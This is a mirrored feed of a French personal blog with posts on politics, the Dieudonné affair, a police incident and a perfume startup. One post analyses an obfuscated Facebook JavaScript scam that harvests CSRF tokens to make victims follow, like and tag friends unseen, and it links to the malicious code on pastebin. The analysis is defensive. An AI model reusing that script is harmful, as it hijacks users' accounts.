Autoblog de paulds.frhttp://www.paulds.fr/http://www.paulds.fr/ La politique en 2 phraseshttp://www.paulds.fr/?p=2658http://streisand.me.thican.net/paulds.fr/index.php?20140323_181655_La_politique_en_2_phrasesSun, 23 Mar 2014 17:16:55 +0000Les politiques mentent, trichent et trahissent jusqu’à leurs proches pendant 4 ans et demi, font le dos rond pendant 6 mois et vous demandent de leur accorder votre confiance pour recommencer…

« La folie, c’est de faire toujours la même chose et de s’attendre à un résultat différent. » A. Einstein

Flattr this!

]]>
Nous vivons un second siècle des lumièreshttp://www.paulds.fr/?p=2647http://streisand.me.thican.net/paulds.fr/index.php?20140201_155933_Nous_vivons_un_second_siecle_des_lumieresSat, 01 Feb 2014 14:59:33 +0000L’Être humain est une créature qui aime ses habitudes, qui vit par elles et ne s’en éloigne qu’en cas de force majeure. Par essence, et à quelques exceptions près, nous aimons notre routine, nos habitudes, nos repères. L’inconnu est terrifiant, le connu est le résultat d’une construction donc les buts étaient justement le confort et la sécurité.

Sauf que ceux qui étaient avant des exceptions, ceux qui justement aiment repousser les limites, réfléchir au-delà des préconçus, expérimenter ont depuis quelques années les moyens de travailler ensemble. D’abord grâce aux transports qui permettaient la circulation des êtres, puis grâce aux télécommunications qui permettent la circulation des idées.

Le résultat est que les progrès que l’humanité aurait pu égrainer sur des siècles sont en train d’être absorbés en quelques décennies. Jamais dans l’histoire nous n’avons vécu autant de changements majeurs en si peu de temps et il y a fort à parier que dans quelques décennies nous atteindrons une nouvelle limitation, la notre, en tant que société : les limites que nous nous refuserons de franchir, et celles dont nous serons incapables de nous affranchir parce que pas équipés biologiquement (intellectuellement et physiquement) pour.

Mais comme pour tout changement majeur il y a résistance, souvent inconsciente, de la majorité lovée dans ses habitudes et effrayée par la notion même du changement.

Étrangement la technologie en elle-même est relativement bien acceptée, les avancées qui en découlent par contre beaucoup moins. Ce qui est nouveau justement est le fait que la technologie soit utilisée des deux côtés de l’innovation pour la créer et y résister. Ainsi on voit apparaître des mouvements organisés (avec comme toujours une idéologie, des leaders et la masse convaincue) qui refusent une forme ou une autre de changement, font valoir leur opinion sur ce qui est progrès ou pas, ce qui est souhaitable ou non de conserver de notre société actuelle pour construire la prochaine.

C’est un processus qui est relativement sain et qui portera ses fruits à long terme pour concilier ce que la majorité tolère avec ce que l’innovation (au sens le plus large du terme) pourra apporter comme solutions à une recherche constante d’amélioration de la vie. C’est aussi une chance unique que de vivre cela, de le voir ou d’y participer, lorsque l’on se rend compte de ce qui se passe réellement : nous sommes en train de construire une société de demain en rattrapant des siècles de retard !

C’est aussi pour cela que certains acquis – et je pense ici, la gorge serrée, à ce qui se passe autour de l’IVG en Espagne – sont remis en question, que la rue hurle et que les mouvements d’opinion sont si nombreux pour défendre ou combattre ceci ou cela. Et là encore c’est rassurant : signe que nous sommes capables de nous rassembler autour d’idées, de concepts, de valeurs (même si j’ai horreur de ce mot fourre-tout) pour défendre une vision, pour réfléchir, avancer dans un sens ou un autre.

A la fin c’est toujours le gentil qui gagne…

 

Flattr this!

]]>
Facebook et petit « hack » Js à base de social-engineering et obfuscation de codehttp://www.paulds.fr/?p=2637http://streisand.me.thican.net/paulds.fr/index.php?20140130_164651_Facebook_et_petit_____hack_____Js_a_base_de_social-engineering_et_obfuscation_de_codeThu, 30 Jan 2014 15:46:51 +0000Depuis quelques jours sur Facebook on tombe sur des images comme celle présentée ci-dessous, vous promettant conversations privées ou logins / mot de passe de vos contacts :

sei2c

 

Le pastebin sur lequel je suis tombé après qu’un ami se soit fait piéger est celui-ci : http://pastebin.com/jg04E8V6 Attention donc à ne pas éxécuter le code qui y est contenu, vous vous en doutez il ne fait absolument pas ce que l’on vous promet 😉 Si vous ne vous intéressez pas à la technique sautez directement à la conclusion.

J’ai passé quelques temps à désobfusquer le code en question (rendu volontairement difficilement lisible afin de dérouter une personne comprenant le Javascript) pour essayer de le comprendre et mis le résultat sur un autre pastebin : http://pastebin.com/0hWB1dVB (mieux non ?)

Au programme : pas mal d’héxa, des noms de variables volontairement illisibles, des retours à la ligne éclatés dans tous les sens, des tableaux de chaines de caractères utilisés plus tard par référence… Bref un beau bordel mais rien d’insurmontable. Par contre on remarque assez-vite que les méthodes d’obfuscation utilisées ne sont pas les mêmes partout, signe qu’il s’agit vraisemblablement d’un assemblage de plusieurs codes récupérés de ci de là. En faisant une recherche par la suite j’ai trouvé plusieurs versions du même code, avec d’autres IDs de pages, commentaires, personnes, … Bref il doit venir d’un endroit où l’on explique comment s’en servir (ou même un générateur), selon toutes vraisemblances un forum et d’après le nom des fonctions non obfusquées il est probable que ça soit d’origine turque (« arkadas » = « amis » en turc; « yorum yap » = « reviewed », …).

Et donc une fois exécuté que fait ce code ?

Il y a plusieurs fonctions avec chacune un but précis et qui vont récupérer votre identité, les jetons CSRF de sécurité et quelques autres paramètres afin de déclencher une ou plusieurs actions à votre insu en fonction de la version du code sur laquelle vous pourrez tomber.

Il vous transformera gentiment l’apparence de votre Facebook (pour y ajouter ce joli background notamment) : rien à craindre de ce côté là, rafraîchir la page rétablit le thème normal.

Le code est supposé jouer un son en fond automatiquement aussi, mais le son en question a disparu de son hébergeur.

function a(abone) – renommée chez moi en follow(id)

Comme son nom l’indique, vous abonne (follow) à l’utilisateur dont l’ID est passé en paramètre. Dans notre code il s’agit des 2 IDs : 100007551819909, 100007551819909. Semblent supprimés.

function sublist(uidss) – pas renommée chez moi

Vous fait suivre une liste ici les IDS 1387237681537946, 1387237764871271, 100007551819909, … (11 au total) De toutes celles que j’ai essayées il semble que Facebook ait suspendu l’existence.

function P(post) – renommée chez moi en likePost(post)

Vous fera liker, à votre insu toujours, un ou plusieurs posts. Ici les IDs 208440912680740, 1385472281714486, 1392225981039116, … (11 au total) Même chose, ils ont l’air d’avoir été supprimés par Facebook. Surement des posts de l’auteur dont le profil a été suspendu.

function Like(p) – pas renommée chez moi

Pour vous faire liker des pages en particulier. Ici les IDs sont 208440912680740, 1388348181426896, 464466333665657, … (11 au total)

function IDS(r) – pas renommée chez moi

Envoyer une demande d’ami. Ici les IDs sont 100007551819909, 100007551819909, 100007551819909. Pareil ils ont l’air supprimés.

function Report(ids) – pas renommée chez moi

Pas utilisée mais devrait permettre de signaler un utilisateur.

function arkadaslari_al(id) – pas renommée chez moi

« Obtenir amis » en turc. Sert à parcourir la liste d’amis d’un utilisateur (vous) par séries de 27 personnes et appellera plus tard la fonction yorum_yap afin qu’elle publie leur nom en commentaire d’un post dont l’ID est id (1392225981039116 ici, supprimé of course).

function RandomArkadas() – pas renommée

Pas utilisée ici mais est supposée récupérer 9 amis au hasard dans votre liste d’amis pour utilisation ultérieure.

function yorum_yap(id, msg) – pas renommée

« Avis » en turc, va ajouter un commentaire sous le post désigné par l’id le commentaire msg qui lui a été généré par arkadaslari_al

Conclusion

J’aurai pu pousser la désobfuscation un peu plus loin mais déjà à ce niveau on peut lire assez facilement le code et en comprendre son fonctionnement à la fois très basique et efficace. Globalement les promesses qui vont avec ce bout de code sont irréalisables, pire il aurait pu en profiter pour faire supprimer des pages (la fonction est là, juste pas utilisée) ou même vous piquer vos informations (ce qui n’est pas le cas dans la version que j’ai analysée mais qui est très simple à ajouter).

Globalement si vos amis ont été victime du truc vous-même ne risquez rien, si vous l’avez exécuté allez vérifier dans votre « activity log » présent sur votre profil sur la photo de couverture à droite (flemme de faire une capture d’écran) afin de vérifier les actions éventuellement effectuées à votre insu.

Facebook pourrait probablement lutter contre ceci mais globalement un code comme celui-ci est très simple à reproduire quelles que soient les mesures de sécurité mises en place du côté de Facebook puisqu’il sera toujours possible depuis un navigateur Web de reproduire l’action d’un humain en javascript. Par contre le social engineering qui est derrière : faire exécuter une action à quelqu’un qui ne la comprend pas en lui promettant quelque chose dont il peut avoir envie, ainsi que le vecteur de propagation idéal qu’est Facebook est assez redoutable.

Pour l’anecdote j’ai publié un statut facebook avec le lien du pastebin en précisant bien de ne pas l’exécuter. Statut que Facebook a tout simplement supprimé automatiquement, surement en dégommant tous les liens correspondants présents sur sa plateforme.

A vous de ne pas tomber dans le panneau 😉

Flattr this!

]]>
Dieudonné, Valls et l’humourhttp://www.paulds.fr/?p=2620http://streisand.me.thican.net/paulds.fr/index.php?20140114_103202_Dieudonne__Valls_et_l___humourTue, 14 Jan 2014 09:32:02 +0000Je n’avais jusque là réagi que peu sur « l’affaire Dieudonné », sur Twitter quelques peu, en discutant avec des proches aussi, et il y avait une bonne raison à mon mutisme : lui faire quelque forme de publicité est pour moi une connerie monumentale. Mais voilà la connerie a été faite par tous ou presque et je n’en peux plus de fermer ma gueule devant ce dégoulinement de mauvaise foi de tous les côtés.

Alors brièvement mon point de vue : Dieudonné a un réel problème d’antisémitisme, certains de ceux qui le combattent le font d’une façon détestable.

Dieudonné M’Bala M’Bala

… ne m’a jamais fait rire, même à l’époque où il était considéré comme un génie du genre, c’est juste pas mon genre. M’enfin il se vend encore des places pour les spectacles de Laurent Gerra donc tous les humoristes ont leur public. Et le problème est justement là : certains, la majorité probablement, de ceux qui veulent le voir en spectacle ne sont pas antisémites eux-même. Les condamner ainsi comme un tout est faire une généralité grave.

Ses spectacles ne sont pas des « meetings de la haine » comme j’ai pu le lire ou l’entendre, ce sont des spectacles avec beaucoup d’humour et des incartades racistes. Une blague doit être prise dans son contexte et là le contexte des déclarations en question est celui d’un spectacle où la majorité du public est venue pour rire.

Sauf que certains ne sont pas là pour ça, et c’est là qu’est le problème. L’ambiguïté entretenue par Dieudonné en dehors de ses spectacles, de par ses relations amicales avec des personnes ouvertement xenophobes, de par la présentation de sa « liste antisioniste » et toutes les déclarations en ce sens font qu’une partie de son public et de l’opinion publique voit en lui plus qu’un humoriste. Lui-même semble hésiter parfois (jamais devant un tribunal par contre) entre les deux casquettes et leurs « avantages » respectifs…

D’autres humoristes, beaucoup plus clairs sur le fait qu’ils ne sont là que pour faire de l’humour, se permettent des blagues bien plus crades que Dieudonné, y compris sur les religions, y compris sur la religion juive. Et vous voulez que je vous dise ? Bah j’adore ça, ça me fait rire ! Dieudonné toujours pas…

Et puis il y a cette position de martyr, idéale par rapport au message prétendument anti-système qui est le sien, qui fait que chaque fois que l’on s’en prend à lui on lui donne un peu plus raison : il est le mal-aimé, l’incompris, la victime d’un système tout puissant qui l’oppresse et le pousse au repli sur lui-même…

Mais bonhomme, tu l’as creusée tout seul ta tombe !

Et c’est là pour moi que Dieudonné est parti en couille et ne méritait rien de plus que l’indifférence (jusqu’au 9 janvier 2014 mais j’y reviens) et les condamnations dont il fait l’objet : le jour où il a compris qu’il avait plus offensé que fait rire et qu’il a décidé de s’entêter d’une part, mais surtout de cultiver cette image qui est la sienne aujourd’hui. Peu importe ce qu’il pense réellement aujourd’hui, ce qui reste est ce qu’il a voulu être son image publique, les dommages qu’il a causés.

Quant à la « quenelle » si elle n’est pas un geste nazi elle pose un souci tout autre : en se documentant plus de 5mn (cherchez l’interview de Soral chez BFMTV dans sa version intégrale de 38mn) on découvre qu’il existe 2 « maîtres quenelliers » : Dieudonné et Alain Soral. Si le premier est ambiguë, le second donne une définition beaucoup plus honnête du geste : c’est un geste anti-système oui, mais pour lui le système c’est les « juifs organisés » (comprendre les juifs qui ont un boulot). Et là il y a un problème en soi, pas besoin de tergiverser 107 ans autour du salut nazi inversé, ce geste et ce qu’il représente daubent et c’est tout.

Là encore, certains fans mal informés font ce geste sans en comprendre la portée, de la nuance bordel !

Et les condamnations étaient là, les amendes décrétées, il suffisait de continuer à le condamner pour ses propos illégaux (prononcés comme tels par un juge) et faire en sorte que lesdites condamnations soient respectées (parce que jusque là ça s’est pas agité des masses de ce côté là) jusqu’à ce que sa fanbase s’épuise, comprenne d’elle-même qu’il y a un problème.

Réduire le racisme, l’antisémitisme, aurait réduit d’autant les gens capables de le suivre en conscience du fait qu’il y a plus que l’humour derrière cet homme. JM Le Pen pourrait sortir le meilleur one man show du siècle que j’y foutrai pas les pieds, par principe…

Manuel Valls

Le calendrier politique étant ce qu’il est (pour ceux qui n’auraient pas remarqué, ça tombe vachement bien cette victoire de Valls à l’approche des municipales) l’histoire ne pouvait pas traîner comme elle le faisait et la justice fonctionne beaucoup trop lentement pour que le scandale prenne à point nommé avec cette échéance qui approche.

Alors dans un style que l’on n’avait pas vu depuis Sarkozy Ier, monsieur Valls a enfourché son cheval blanc et bafoué tout ça comme un sauvage pour obtenir une condamnation qui n’aura qu’un effet « positif » : foutre Dieudonné dans une merde financière noire (encore que ça se discute puisque l’on ne sait pas quelle part de ses revenus est dégagée de ses spectacles vivants).

Pour lui la victoire est celle « de la république » en ce sens qu’aujourd’hui tout le monde considère Dieudonné comme antisémite… Permettez moi, après avoir parcouru les réseaux sociaux ou sites de fans, d’en douter. Pire mon petit Manuel tu apportes une pierre à son édifice en caricaturant le problème (réel) et en lui apportant une réponse de sauvage inédite.

Pire certains fans venus pour l’humour commencent à se dire « merde il a raison Dieudo », la position de martyr a bien aidé sur ce coup là, et tu le savais pertinemment !

Certains ont argumenté qu’il ne s’agit pas d’une censure a priori mais d’une décision basée sur un spectacle écrit, joué et condamné auparavant. Sauf erreur de ma part, le spectacle en question n’a fait l’objet d’aucune condamnation. L’homme qui l’a écrit et l’interprète oui mais pas le spectacle en lui-même.

Ce qui veut dire qu’il s’agit bien là d’une censure a priori, et quel que soit l’avis que l’on a sur Dieudonné (et encore une fois personnellement cette personne me dérange) c’est glisser vers quelque chose de dangereux. Accessoirement la procédure express en référé, appel, conseil d’État en une demi-journée est elle aussi hallucinante (et donne aussi du grain à moudre à l’incriminé).

Tout cela fait que l’on est loin d’une « victoire de la république », on est même très loin d’une victoire de qui que ce soit. Tu viens de commettre une atteinte atroce à la liberté d’expression (ceci dit Dieudonné n’est pas le dernier à utiliser les avocats pour faire censurer des propos non plus, allez voir chez JC Elfassi par exemple) qui aura pour seul effet de rendre plus populaire la personne que tu cherchais à faire taire.

Et à titre personnel Manuel je t’en veux de me faire prendre la défense de quelqu’un que j’en arrive à mépriser…

A la sortie de ce bordel…

Si effectivement une forme de conscience s’est éveillée ce n’est pas, à mon humble avis, la bonne. Il suffit pour juger de cela de regarder aujourd’hui les critiques du sketch de Nicolas Bedos en date du 11 janvier qui souvent sont de l’ordre de la comparaison avec Dieudonné, certains faisant le parrallèle entre les deux, alors qu’il n’y a rien à voir entre les deux hommes (là encore sans aucun avis sur le comique des deux).

Il fallait réagir aux discours de Dieudonné; mais comme toujours il y a une chose à faire et une façon de le faire. La façon employée a été détestable et donne finalement plus d’avantages à Dieudonné qu’elle ne le condamne : elle lui a fait une publicité (il n’y a pas de mauvaise publicité) internationale, le conforte dans sa position de martyr « du système » et rend ses fans hardcore plus fidèles encore (et en particulier ceux qui justement sont là moins pour l’humour que pour le « message »).

Un autre angle, que je n’ai pas vu abordé dans la presse, me paraît assez triste : j’ai peur qu’à compter d’aujourd’hui les humoristes vont être jugés sur leur humour oui, mais aussi sur leur capacité à créer la polémique et qu’à ce petit jeu l’humour va devenir un fait intime, dont on ne parle qu’aux gens qui nous connaissent de peur d’être taxé de détester telle ou telle catégorie de personnes visées par ledit sketch. Je me souviens d’un excellent sketch d’une personne que je ne nommerai pas sur les trisomiques, dire que j’ai adoré ce sketch veut-il dire que je déteste les trisomiques ? que lui les déteste ?

Et puis arrive l’Internet, cette foutue zone de non-droit, qu’il va falloir mettre au pas (certains disaient civiliser) parce que ces messages de haine sont insupportables. Bah oui mais la haine existe, c’est triste, c’est condamnable mais y’a pas besoin de censurer le Net que je sache ? Par exemple dans le cas Dieudonné, s’il poste une vidéo tombant sous la loi Gayssot, il est possible de le faire condamner pécuniairement mais aussi à la retirer (en tant qu’objet du délit) – a posteriori, comme « dans la vraie vie », comme dans un État de droit…

Finalement j’en arrive à penser que tout cela aurait pu être évité si les humoristes s’étaient fendus de réponses intelligentes et fortes plus tôt comme Elie Semoun l’a fait sur Canal ce 11 janvier; Et je suis triste d’imaginer ce que ce précédent de censure a priori va faire à l’humour mais pas seulement…

Flattr this!

]]>
J’ai changé de boulot… / On se boit un coup ?http://www.paulds.fr/?p=2596http://streisand.me.thican.net/paulds.fr/index.php?20130903_145838_J___ai_change_de_boulot______On_se_boit_un_coup__Tue, 03 Sep 2013 12:58:38 +0000Désolé, je vais vous infliger un billet my life mais j’ai mes raisons et y’a une proposition d’apéro ouvert à la fin alors vous plaignez pas trop bourdel !

J’ai quitté la dernière société où j’étais employé (en avril dernier déjà) avec l’objectif de ne plus jamais être salarié. Non je ne pars pas (encore) à la retraite, je me focalise simplement sur l’entrepreneuriat, ce que j’aime vraiment faire, ce que j’aime vraiment créer…

Je travaille à l’heure actuelle sur plusieurs projets d’entreprises – certaines existantes que j’ai rejoint, d’autres en cours de création – en France comme à l’étranger, surtout à l’étranger – et ai décidé de ne plus vivre que de cela à partir de maintenant et jusqu’à ce que mon foie me lâche… Non y’a pas de date, juste que ça reste la raison la plus probable pour m’arrêter à date.

Je vous en dirai surement plus sur les sociétés en question dans un futur proche, vous les vendrai comme si mon avenir en dépendait (d’ailleurs c’est le cas), mais pour le moment j’ai décidé de me mêler le moins possible de la vie publique d’ici là, de faire profil bas pour probablement mieux revenir un jour parce que ça me manquera trop.

Un ami cher à mon coeur m’a un jour dit que mes idées étaient bonnes mais qu’elles n’auraient pas d’impact réel tant que des emplois et impôts sérieux ne dépendraient pas de moi… Alors je m’applique et fous la merde à un autre niveau.

Aussi je vous prie de me pardonner, toi fidèle lecteur, si pendant un temps je vais faire de l’auto-promo et relativement peu de réflexion philoso-politique de derrière les fagots. Y’a des chances que mon Twitter devienne un recueil de troll et de lulz salvateur qui me caractérisent dans le privé.

Sur un autre sujet (ouep tu la vois venir la partie sur l’apéro ?) : vendredi prochain (le 6 septembre) on se boit un coup à partir de 19h30 au café de la place, dans le 10e arrondissement de Paris avec qui viendra – l’Internet est le bienvenu, oui toi aussi qui lit ce billet et n’est pas loin de la géolocalisation dont on parle, on causera de tout et de rien avec des gens biens ! Plus on est de pédonazis et plus on rit !

Hésitez pas à préciser en commentaire si vous pensez venir que je prévienne le patron afin que l’on réserve la terrasse ou pas 😉

Bisous, lol
Paul

Flattr this!

]]>
Presque 26 ans, ma première agression policière !http://www.paulds.fr/?p=2576http://streisand.me.thican.net/paulds.fr/index.php?20130630_083917_Presque_26_ans__ma_premiere_agression_policiere__Sun, 30 Jun 2013 06:39:17 +0000Plantons le décors, je sortais de boite, j’avais un peu bu mais la seule chose que je voulais faire était rentrer chez moi, dormir. Il est pas loin de 6h du matin, je décide de prendre le métro au lieu d’un taxi, mais la ligne une est fermée alors je me dirige vers la 5 qui me fait faire un détour mais me ramène quand même à un moment, on est à Bastille.

Sur le quai d’en face, un beau bordel, deux groupes de djeunzs (comme ils disent sur TF1) qui se foutent à moitié sur la gueule pour une histoire de portable. De mon naturel diplomatique et casse-couille je fais le tour (ratant au passage mon métro mais finalement vu le temps que j’ai perdu on n’est pas à ça près) pour essayer de comprendre et calmer les choses… Ce que, par magie on va dire, je parviens à faire et le portable finit par revenir à son propriétaire, le groupe du gars qui l’avait subtilisé disparaît en même temps qu’arrive la sûreté RATP.

Jusque là tout va bien, je l’explique à ces gentils messieurs en uniformes qui fissa contrôlent mon titre de transport. Voyant le bordel et comprenant qu’ils allaient verbaliser le groupe de ceux qui venaient de se faire agresser parce qu’il n’avaient pas de tickets je me propose de payer les tickets ou les amendes… Ça les énerve un peu et ils commencent à me pousser relativement violemment (je fais 1.80m pour 72kg, faut y aller un peu pour me bouger) puis, en me tutoyant alors que je les vouvoyait, et en utilisant un vocabulaire fleuri me demandent de dégager…

Je refuse, ils veulent contrôler mes papiers d’identité, je refuse aussi et demande à ce que ce soit la police qui se livre à cet exercice (je ne suis pas sûr encore ce lendemain qu’ils avaient autorité pour demander ça) mais du coup j’ai un doute qui m’assaille et me retourne vers un des membres du groupe qui venait de se faire agresser pour lui demander discrètement s’ils ont tous des papiers en règle… La réponse est non…

Du coup je fais diversion pour qu’ils montent dans le métro et soient tranquilles, assez de bruit pour que la sûreté RATP ne pense même pas à signaler à la radio qu’ils ont des fuyards sur la ligne, mais tout en restant poli et courtois… Je suis d’ailleurs le seul dans l’histoire à le rester.

Et puis arrive la police, dont un cow-boy, qui me demande de foutre les mains sur le mur, me palpe, me fait vider mes poches, dire que je n’ai rien de dangereux sur moi, me re-palpe, me demande mes papiers. Je les lui donne, ça gueule, ça s’énerve, je reste courtois, continue à les vouvoyer jusqu’à ce que j’en ai marre qu’il me prenne de haut et m’insulte à moitié entre chaque tutoiement et que je demande son identité (qu’il refusera de décliner alors qu’il doit, légalement, le faire). Je finis par demander à payer l’amende qu’ils vont forcément me mettre avant qu’ils me laissent tranquille ou, à la limite, d’être placé en garde à vue… Mais qu’ils choisissent par pitié j’en ai marre !

Bref ça gueule, gueule et gueule et je reste impassible en leur répondant que quelle que soit l’amende qu’ils me mettent je la paierai, que s’ils veulent aller plus loin je les suivrai et que moi aussi j’irai plus loin dans la mesure où j’ai été traité comme un clébard par ces gens en uniforme payés par mes impôts…

Ils finissent par décider de me verbaliser pour un refus d’obtempérer (ce qui est peut-être le seul truc que j’ai pas fait à ce moment là, j’aurai mieux vécu l’outrage à la limite) et me verbalisent sans me laisser le droit de payer ou même me donner l’amende (je sais toujours pas combien je leur doit à l’heure actuelle)… Puis ils décident de me sortir à grands renforts de clefs de bras (un par bras, j’ai l’épaule droite démise depuis quelques années j’en chie) et de commentaires odieux sur ma personne (« encore un qui connait ses droits », « un fils de bourge qui se la pète », …) J’avoue avoir résisté un peu à partir de là, quitte à avoir un refus d’obtempérer autant le jouer jusqu’au bout…

Bref me voilà en surface à Bastille, ils ont refusé ma CB mais si je vais tirer des thunes ils vont peut-être les prendre pour régler cette conne de prune. Réponse du cow-boy, arrêtez de nous suivre, si vous revenez avec du liquide on le refusera… Le temps que je tire du liquide ils avaient de toutes façons disparu…

Je les cherche 5mn sur la place, 5mn dans les couloirs du métro, puis j’appelle le 17 pour expliquer que je viens de me faire agresser par des collègues à eux. A deux reprises je me suis fait raccrocher à la gueule en 3mn 55 pour le premier puis 2mn tout pile pour le second…

Du coup je vais au commissariat de police, pas loin, qui m’explique que Bastille est sur plusieurs arrondissements et que c’est pas eux (sans vérifier les fichiers) puis que de toutes façons il prendraient pas la plainte parce que j’ai bu… Accessoirement il ne veulent pas entendre parler de l’amende et refusent de me l’encaisser… Il finit même par me dire que j’aurai mieux fait de me mêler de mon cul, alors que j’ai juste évité qu’une dizaine de personnes se foutent sur la gueule sur un quai de métro….

En bref, j’avais bu (et je suis toujours sous influence, pour autant j’ai écrit ce texte donc il me semble que je suis putain de lucide) mais je suis resté courtois, vous vous êtes comportés comme des abrutis et la différence entre ma cuite et votre connerie c’est que moi j’ai déjà décuvé…

flattr this!

]]>
Ne remplaçons pas un extrême par un autre…http://www.paulds.fr/?p=2569http://streisand.me.thican.net/paulds.fr/index.php?20130606_122817_Ne_rempla__ons_pas_un_extreme_par_un_autre___Thu, 06 Jun 2013 10:28:17 +0000L’actualité est entachée aujourd’hui par une agression, tragique, présentée comme politique, d’un jeune homme à Paris. Lui proche de l’extrême gauche, ses agresseurs présentés comme des skinheads (le conditionnel s’impose, les agresseurs étant toujours en liberté) il n’en fallait pas moins pour que l’information transpire via le blog d’un élu du front de gauche et que la machine médiatique s’emballe.

Et donc les médias s’en mêlent, les politiques – dont le métier est de plus en plus de faire de la télévision que d’avoir des idées – hurlent, pleurent et font des déclarations plus stupides les unes que les autres. Parmi ces voix là, une me choque plus que les autres (la vacuité ne me choque tristement plus en politique). Cette voix c’est celle de l’extrême gauche qui appelle à la dissolution de l’extrême droite, ou pour certains plus mesurés à celle de groupuscules d’extrême droite.

Et c’est là que ça part en couille : des appels au meurtre (la loi du talion), d’autres à l’interdiction pour ces fascistes de s’exprimer, des amalgames à l’emporte pièce…

Précisions tout de suite les choses : j’ai ces groupes (GUD, JNR, Civitas, …) en horreur – je ne rêve que de leur disparition et d’un monde dans lequel on pourrait s’aimer les uns les autres et vivre heureux jusqu’à mourir de vieillesse.

Mais…

Depuis quelques temps je m’attriste de voir les prises de position de plus en plus radicales de l’extrême gauche, du front de gauche pour ceux qui n’aiment pas que l’on les catalogue à l’extrême. Je constate que ce mouvement qui profite bien sur de la crise et d’autres éléments de l’actualité joue le même jeu que l’extrême droite mise en cause aujourd’hui, surfe sur les faits divers à grand renfort de récupération politique et en profite pour attiser doucement une autre forme de haine. Il suffit de lire quelques commentaires sur les blogs étiquetés front de gauche pour s’en convaincre (ci dessous quelques commentaires de l’article original).

Et là je ne peux m’empêcher de faire le parallèle avec le FN et ses méthodes.

Alors vous me rétorquerez que jamais le front de gauche ou ses sympathisants n’ont été jusqu’au meurtre. Non en effet, pas à ma connaissance, mais les méthodes étant les mêmes n’est-on pas en droit de se poser des questions sur l’avenir, sur ce qui nous attend à ce rythme et en utilisant les méthodes de ceux qui aujourd’hui ont passé le pas ?

Je n’ai pas de solution miracle, je n’ai pas de réponse géniale à apporter à ce qu’il vient de se passer et rien ne ramènera ce jeune homme à la vie. Mais doit-on pour autant remplacer un extrême par un autre ? Je pense que non.

Flattr this!

]]>
100% mag, M6, entre manipulation et conflit d’intérêthttp://www.paulds.fr/?p=2558http://streisand.me.thican.net/paulds.fr/index.php?20130516_140501_100__mag__M6__entre_manipulation_et_conflit_d___interetThu, 16 May 2013 12:05:01 +0000Si je suis beaucoup moins présent sur Internet en apparence ces derniers temps c’est parce que j’ai enfin réussi à revenir à mes premiers amours d’entrepreneur et que j’ai pris des participations dans plusieurs sociétés que j’administre ou aide en fonction de mon niveau d’implication. Tout cela me prend un temps fou mais j’adore ça et je m’amuse vraiment…

Et parmi ces sociétés une de celles dans lesquelles je suis aujourd’hui le plus impliqué est Pirate Parfum, dont je vous avais parlé il y a quelques temps ici (avant de travailler avec eux pour le coup), et surtout qui est passée hier dans 100% Mag, émission conso de M6.

Petit décryptage de ce joli foutage de gueule (à la fin de l’émission – edit : le lien est bloqué chez certains, il faut alors le copier / coller) :

Pour commencer il faut que vous ayez en tête le nombre de pubs pour du parfum qui sont diffusées chaque jour sur une chaîne comme M6, les budgets colossaux que cela représente pour ladite chaîne, et les relations de copinage que ça induit de façon presque mathématique… Voilà, vous avez la grosse pile de billets en tête, on continue !

Le reportage intitulé « enquête : faut-il se méfier des parfums low cost » nous avons forcément été contactés pour discuter avec ces gens de M6 de notre démarche, de notre concept, de la différence entre nos parfums et ceux qu’ils appellent « les originaux » dans tout le reportage – partant du même coup du postulat qu’en dehors des marques qui diffusent de la pub chez eux, tous sont forcément des copies – mais aussi la différence entre notre offre et de la contrefaçon.

Un long entretien donc pour essayer d’éviter… ce qui est arrivé !

Le reportage balaye rapidement les parfums vendus en grande surface, puis des faux / volés sur un marché, pour se concentrer sur la mise en parallèle de trois produits : un acheté en parfumerie, un acheté chez Pirate Parfum et un dernier acheté en caméra cachée à un mec en blouson à Barbes (le cliché M6 habituel par ailleurs).

Mon associé est aussi interviewé au téléphone, brièvement, et bien sûr (je l’ai au téléphone tous les jours) la voix est déformée pour obtenir l’effet « faites entrer l’accusé » qui donne tout de suite au téléspectateur l’idée qu’on a affaire à un escroc qui vend des maisons qui n’existent pas à des petits vieux qui ont Alzheimer… Première manipulation…

Sont ensuite interrogés successivement (on vous a dit que c’était une enquête !) un juriste (qui a bossé chez LVMH et travaille maintenant chez Unifab dont le conseil d’administration vous en dit long sur les points de vue), un labo qui donne des conclusions intéressantes aussitôt déformées par la voix off, et un dermatologue qui ne parle clairement pas de notre parfum mais de celui acheté à Barbes – là aussi la voix-off se gardera bien de préciser que ce qui est valable pour un truc fabriqué en Chine et dont on ne sait rien de la composition n’a rien à voir avec un produit élaboré et fabriqué à Grasse selon les mêmes contraintes que ces parfums qu’ils ont tant envie d’encenser. Depuis 2 ans que Pirate Parfum existe, avec plusieurs milliers de clients, la plupart récurrents, nous n’avons d’ailleurs jamais eu un seul retour pour des motifs d’allergie…

A ce niveau là la confusion est volontairement entretenue, lorsque l’on entend notamment la voix-off donner les résultats d’un test sur la concentration en alcool (plus c’est élevé moins le parfum tient) en insistant sur les scores de la bouse de Barbes made in China et sur le notre, sans bien sûr préciser que celui du parfum concurrent est très proche de ce que nous réalisons avec 89.7% pour notre parfum et 88.1% pour le concurrent. On le voit d’ailleurs nettement à l’image. J’ajouterai que cette mesure est loin d’être pertinente puisque pour mesurer le taux de concentration en huiles essentielles ils ont mesuré le diluant (l’alcool) au lieu de se concentrer sur les huiles en elle-même, ce qui aurait donné une mesure plus juste : nos chiffres sont plus proches des 16% de concentration…

100mag_concentration_parfums

Bref là où l’on nous avait promis une enquête sur les parfums low cost on a eu le droit à un démontage en règle d’une entreprise innovante,  dont le principe est justement de court-circuiter les réseaux de distribution habituels et de ne pas investir en pub sur M6, pour des raisons que je vous laisse deviner vous même (repensez à la pile de billets dont on parlait tout à l’heure).

Le retour plateau s’effectue finalement sur une présentatrice tout sourire qui lâchera un « ça serait quand même bien dommage d’abîmer sa peau à l’approche de l’été » auquel je répondrai : en effet, n’achetez pas votre parfum à Barbes, ne croyez pas M6 dans leurs opérations de copinage et venez vous parfumer chez nous, les prix sont les mêmes qu’à Barbes mais la qualité est la même que chez le parfumeur… C’est pas moi qui le dit, c’est M6 !

flattr this!

]]>
Après la Ve république viendra la 1ère démocratiehttp://www.paulds.fr/?p=2543http://streisand.me.thican.net/paulds.fr/index.php?20130326_103250_Apres_la_Ve_republique_viendra_la_1ere_democratieTue, 26 Mar 2013 09:32:50 +0000Il n’est plus un jour sans que nos structures ou Hommes politiques ne soient désavoués, plus un jour sans qu’un scandale explose, sans qu’une bourde s’ébruite, plus un jour où l’on puisse se dire que « oui, ça ira mieux demain ».

